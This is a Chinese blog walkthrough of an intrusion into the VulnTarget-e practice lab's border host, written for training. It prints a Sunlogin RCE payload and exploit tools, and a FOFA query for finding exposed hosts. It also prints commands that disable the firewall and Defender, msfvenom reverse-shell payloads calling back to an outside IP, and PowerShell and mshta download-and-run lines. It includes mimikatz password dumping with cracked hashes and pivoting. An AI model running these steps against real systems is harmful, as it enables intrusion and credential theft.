0x01 学习目标
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!这是VulnTarget-e靶机的解题第一篇,拿下边界主机权限。后续还有二、三、四篇。
0x01 学习目标
低版本向日葵上线、绕windows server2016版本windows Defender、host碰撞、绕宝塔、绕端口限制、出站规则探测、绕过disable_function、mssql的利用、smb爆破、基于资源的约束委派、约束委派等等都可以尝试。
靶机下载:其中Vulntarget-e为本次实验机器
https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q
提取码: 1p9p
0x02 靶机信息
域控主机
服务账户--》约束性委派
username:wins2016
password:qweASD123
Dusername:vulntarget\administrator
Dpassword:8A..;123admin
NIC1:10.0.10.10
0x03 漏洞探测
#Nmap扫描
nmap -sC -sV -p 0-65535 -n -vv --min-rate=2000 192.168.1.5
-sV:版本探测
-vv:显示详细信息
-p 0-65535:探测其0-65535端口
--min-rate=2000:最小的发包速率
-sC:等价于–script=default,使用默认类别的脚本进行扫描 可更换其他类别
#49773端口返回
{"success":false,"msg":"Verification failure"}
步骤二:访问其49773端口返回如上内容,可使用observer_ward工具识别其指纹获取到 sunlogin 信息,初步判断为向日葵远程控制程序....
#程序下载
https://github.com/0x727/ObserverWard/releases/download/v2022.3.15/observer_ward_v2022.3.15_x86_64-unknown-linux-musl.tar.gz
tar -zxvf observer_ward_v2022.3.15_x86_64-unknown-linux-musl.tar.gz
#指纹库升级
./observer_ward -u
#指纹探测
./observer_ward -t http://192.168.4.150:49773/
步骤二:使用向日葵的Payload进行测试,首先获取其CID值并作为cookie拼接执行命令的Payload的返回其执行命令结果,Success!
Sunlogin RCE 是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号。
#拼接路径
/cgi-bin/rpc?action=verify-haras //获取CID值
/check?cmd=ping../../../../../../../../../../../windows/system32/whoami //执行命令
#批量搜索
fofa:body="Verification failure" && port="49155"
步骤三:经过以上测试可以确定目标存在CVND-2022-10270漏洞,这里使用以下项目工具进行漏洞利用
#漏洞检测利用
https://github.com/j2ekim/sunlogin_rce //批量检测
https://github.com/1rm/SunloginClient_RCE //获取其交互式命令执行
https://github.com/ddwGeGe/SunloginRCE_GUITools //图形界面
#执行命令
python3 main.py -u 192.168.4.150 -p 49773 -e //获取目标的交互式接口
hostname --》 WIN-HHP4Q76IAO9
tasklist /svc --》 MsMpEng.exe-> Microsoft Security Essentials
ipconfig /all --》 192.168.4.150 192.168.100.155 WorkGroup
pwd --》 C:\Windows\system32
dir C:\Users\ --》无域用户登陆痕迹
net user --》 本地账户:Administrator(管理员) ash(普通用户)
netsh advfirewall show allprofile state --》防火墙开启
netsh advfirewall set allprofiles state off --》关闭防火墙
#注解
因为这里的向日葵程序是system的权限,所以可以关闭防火墙
步骤四:用以上命令关闭掉防火墙后再次使用Nmap扫描可以看到能够扫描到其他的端口信息...
0x04 上线MSF
#生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=101.42.118.221 lport=9292 -f exe -o eve.exe
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.3
set lport 9292
run
#Poewrshell下载
powershell(new-object System.Net.WebClient).DownloadFile('http://192.168.1.4:8080/123.exe','C:\Users\Administrator\a.exe')
#执行上线...
cd C:\Users\Administrator;dir
start C:\Users\Administrator\a.exe
-------------------------------分界线---------------------------------------------------
#生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=101.42.118.221 lport=9651 -f hta-psh -o 1.hta
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.3
set lport 9651
exploit -j
#开启服务
python2 -m SimpleHTTPServer 8000
#执行上线
mshta http://101.42.118.221:8000/1.hta
set-MpPreference -DisableRealtimeMonitoring $true //关闭defender实时保护
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \"C:\Users\Administrator\" //PowerShell策略绕过
ps //查看进程
migrate pid //迁移进程,注意进程运行架构
cd C:\\Users\\Administrator\\Desktop //存在需要测试的地址.txt
download 需要测试的地址.txt /home/z4pts/桌面 //下载文件
#抓取密码
load kiwi
kiwi_cmd lsadump::sam
Administrator:388f586516a4cba963b4181363b44034 //解密:win2008
ash:96783bb69c00614e88f7d4688623c83a //解密:qweASD123
#添加路由
use post/multi/manage/autoroute
set session 1
run
or
run autoroute -s 192.168.100.0/24
run autoroute -p
#开启远程
run post/windows/manage/enable_rdp
#远程连接
mstsc
0x06 往期精彩
实战对某棋牌app渗透测试
如何画出优雅的攻击流程图【攻防复盘必备】